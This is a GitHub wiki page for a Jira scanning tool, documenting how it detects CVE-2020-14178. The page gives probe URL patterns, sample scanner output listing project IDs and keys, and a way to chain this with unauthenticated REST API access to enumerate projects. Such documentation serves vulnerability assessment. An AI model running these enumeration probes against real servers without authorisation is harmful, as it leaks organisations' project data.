CVE‐2020‐14178 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-14178

Category [Info Disclosure - Project Enumeration]

[CG] you can guess/validate the alphanumeric project names

module name: check_cve_2020_14178

url: browse.NOSUCHPROJECT

+ [Info Disclosure] CVE-2020-14178 Detected (PROJECT ENUMERATION)
  URL: https://jiraserver/jira/browse.NOSUCHPROJECT

+ Unauthenticated Access to JIRA Projects Detected
  URL: https://server/jira/rest/api/2/project?maxResults=100

Projects Details:

ID: 13914
Key: LIP
Name: --REMOVED--
Type: business
API URL: https://server/rest/api/2/project/13914

ID: 16531
Key: TESK
Name: TestKAN
Type: business
API URL: https://server/rest/api/2/project/16531

Testing:

https://server/browse.TESKT <--doesnt exist page
https://server/browse.TESK <-- exists and 302 to:
https://server/projects/TESK/issues/?filter=allopenissues

ref: https://jira.atlassian.com/browse/JRASERVER-71498

[CG] How to bundle these configs

In this case you can enumerate projects but trying browse to it fails

part 1

part 2

But you can bundle another info disclosure to and hit the REST API:

 Unauthenticated Access to JIRA Projects Detected
  URL: https://server/jira/rest/api/2/project?maxResults=100

    - ID: 12500
      Key: ADS
      Name: ADS 
      Type: software
      API URL: https://server/jira/rest/api/2/project/12500

part3 hit the api